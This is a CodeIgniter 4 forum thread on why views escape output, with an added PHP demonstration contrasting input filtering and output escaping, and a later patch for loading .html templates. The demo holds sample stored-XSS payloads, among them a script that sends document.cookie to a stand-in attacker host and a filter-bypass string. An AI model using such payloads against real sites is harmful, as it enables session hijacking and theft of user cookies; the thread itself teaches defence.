CodeIgniter Forums
CI4: what the use of esc inside view - Printable Version

+- CodeIgniter Forums (https://forum.codeigniter.com)
+-- Forum: CodeIgniter 4 (https://forum.codeigniter.com/forumdisplay.php?fid=28)
+--- Forum: CodeIgniter 4 Discussion (https://forum.codeigniter.com/forumdisplay.php?fid=31)
+--- Thread: CI4: what the use of esc inside view (/showthread.php?tid=71268)



CI4: what the use of esc inside view - anthos1984 - 07-24-2018

What is the use of escaping inside a renderer or view?

I don't see any threat, because the content is generated by the developer's code or the developer's template, which is not intended to harm their users.


RE: CI4: what the use of esc inside view - enlivenapp - 07-24-2018

Not all content is generated by the developer's (code/template)...

Don't assume you'll catch everything going in or your customers won't find a way to break something(because they will).


RE: CI4: what the use of esc inside view - Pertti - 07-25-2018

Indeed, it's when users try to add script tags.

For example, if they manage to add a script tag to their name, which has no visual representation, they could hijack admin sessions every time an admin user checks anything to do with said user name.

A few years back the common way was to filter through all of that and save the cleaned values to the DB. That has a drawback: if someone manages to find a way around the filters, all old data would need to be checked again, something you, as the developer, might not even be aware of - giving you a false sense of security.

So at the moment the best practice seems to be: store it as-is in the DB, and escape everything when displaying it.
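
A worked illustration of the point above, added here as an example; it is not code from the thread or from CodeIgniter itself. A constructed set of attacker-supplied display names goes through a naive "filter on input, save the cleaned value" step and is rendered raw, versus being stored verbatim and escaped with plain htmlspecialchars() at output. The payloads, naiveFilter(), escHtml(), renderUserRow() and the crude looksExecutable() check are all assumptions made up for the demonstration.

```php
<?php
// Added example, not part of the thread or of CodeIgniter: stored XSS through a
// user's display name, and why "store raw, escape on output" beats "filter on input".
// Only plain PHP is used; naiveFilter, escHtml, renderUserRow, looksExecutable and
// PAYLOADS are hypothetical names made up for this demonstration.
declare(strict_types=1);

// Constructed sample input: values an attacker might submit as their display name.
const PAYLOADS = [
    'plain'  => 'Alice',
    'script' => '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    'event'  => '<img src=x onerror="alert(document.cookie)">',
    'split'  => '<scr<script>ipt>alert(1)</scr</script>ipt>',
];

// The old approach: strip <script> tags once, then save the "clean" value to the DB.
// It knows about one tag and makes a single pass, so it is easy to get around.
function naiveFilter(string $name): string
{
    return str_ireplace(['<script>', '</script>'], '', $name);
}

// The current approach: store the value verbatim and escape it where it is output.
// ENT_QUOTES also escapes single and double quotes, so the same call is safe for
// text nodes and for quoted attribute values; ENT_SUBSTITUTE stops htmlspecialchars()
// returning '' on invalid UTF-8, which would silently blank the field.
function escHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// A stand-in for one row of an admin user list. The escaped branch corresponds to
// echoing esc($name) in a CodeIgniter view; the raw branch to echoing $name as-is.
function renderUserRow(string $storedName, bool $escapeOnOutput): string
{
    $cell = $escapeOnOutput ? escHtml($storedName) : $storedName;
    return '<tr><td title="' . $cell . '">' . $cell . '</td></tr>';
}

// Returns, per payload, the markup each strategy would send to the admin's browser.
function compareStrategies(array $payloads): array
{
    $rows = [];
    foreach ($payloads as $label => $raw) {
        $rows[$label] = [
            'filter_on_input'  => renderUserRow(naiveFilter($raw), false),
            'escape_on_output' => renderUserRow($raw, true),
        ];
    }
    return $rows;
}

// Crude demo check: did a tag from the stored value survive into the markup unescaped?
function looksExecutable(string $html): bool
{
    return (bool) preg_match('/<(script|img)\b/i', $html);
}

foreach (compareStrategies(PAYLOADS) as $label => $out) {
    echo "== $label ==\n";
    foreach ($out as $strategy => $html) {
        $verdict = looksExecutable($html) ? 'EXECUTES' : 'inert';
        printf("%-17s [%s] %s\n", $strategy, $verdict, $html);
    }
}
```

Run it with `php` on the command line. The 'script' row shows the filter catching the obvious case; the 'event' row shows a payload the filter never looked at, and the 'split' row shows a payload that is reassembled into `<script>alert(1)</script>` by the filter's own single pass. In both failing cases the value has already been saved, which is exactly the "old data has to be re-checked" problem described above, whereas escaping at output treats all four inputs the same way. One caveat a practitioner should keep in mind: HTML escaping is correct for text nodes and quoted attribute values, but not for a value dropped inside a `<script>` block, a CSS property or a URL; CodeIgniter 4's `esc()` takes a second context argument (`'attr'`, `'js'`, `'css'`, `'url'`) for those, and the escaping has to match where the value lands in the page.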


RE: CI4: what the use of esc inside view - elephpantech - 07-25-2018

https://www.phptherightway.com/#data_filtering


RE: CI4: what the use of esc inside view - anthos1984 - 07-25-2018

(07-25-2018, 01:22 AM)Pertti Wrote: A few years back the common way was to filter through all of that and save the cleaned values to the DB. That has a drawback: if someone manages to find a way around the filters, all old data would need to be checked again, something you, as the developer, might not even be aware of - giving you a false sense of security.

That somewhat answers my question.
I get it. But I haven't seen a live example.

I forked CI4's View to accept min.html as a template view (as in CI3), and wonder if I can skip some checks to eke out performance.


RE: CI4: what the use of esc inside view - kilishan - 07-25-2018

(07-25-2018, 04:14 PM)anthos1984 Wrote:
(07-25-2018, 01:22 AM)Pertti Wrote: A few years back the common way was to filter through all of that and save the cleaned values to the DB. That has a drawback: if someone manages to find a way around the filters, all old data would need to be checked again, something you, as the developer, might not even be aware of - giving you a false sense of security.

That somewhat answers my question.
I get it. But I haven't seen a live example.

I forked CI4's View to accept min.html as a template view (as in CI3), and wonder if I can skip some checks to eke out performance.

Don't skimp where security is concerned. And don't worry about performance that much. CI is pretty darned fast. If you have a view that is slow - cache that view and call it done.


RE: CI4: what the use of esc inside view - kilishan - 07-26-2018

(07-25-2018, 04:14 PM)anthos1984 Wrote: I forked CI4's View to accept min.html as a template view (as in CI3), and wonder if I can skip some checks to eke out performance.

A question, though - what do you mean "accept min.html as template view"? You should be able to do everything that you could with CI3, and if not, I'd like to see about fixing that in the core.


RE: CI4: what the use of esc inside view - anthos1984 - 07-28-2018

(07-26-2018, 06:17 AM)kilishan Wrote: A question, though - what do you mean "accept min.html as template view"? You should be able to do everything that you could with CI3, and if not, I'd like to see about fixing that in the core.

In CI4, system/View/View.php has this line (about line 170):
PHP Code:
$this->renderVars['view'] = str_replace('.php', '', $view) . '.php';
As I see in the docs, it accepts the template file as a PHP file (you call them views, but I don't want to get confused with the view controller or renderer).
If I have .html, then it looks for my file as min.html.php, which does not exist.

So I changed it to this (as in CI3):

PHP Code:
// pathinfo() returns an empty string, not NULL, when the name has no extension
$fileExt = pathinfo($view, PATHINFO_EXTENSION);
$realPath = ($fileExt === '') ? $view . '.php' : $view;
$this->renderVars['view'] = $realPath;
So it adds .php only if the template file doesn't have an extension.
If you ask why I didn't use .php: because the minify tool in NetBeans can pick up .html and rename it to .min.html (it cannot rename to .php).

We don't need to send comments and empty space, so it reduces the amount of data to send. Also, stripping with a PHP script takes time; it is better to strip it before serving the pages to the user. You can also compress some images to reduce it further (stripping EXIF data if not needed, compressing PNGs, vacuuming SVGs, etc.).


RE: CI4: what the use of esc inside view - kilishan - 07-28-2018

Oh, gotcha. Yeah, that should be fixed. Can you file an Issue over at GitHub please so that it doesn't get lost?


RE: CI4: what the use of esc inside view - anthos1984 - 07-28-2018

I haven't used GitHub before. But I have uploaded the proposal.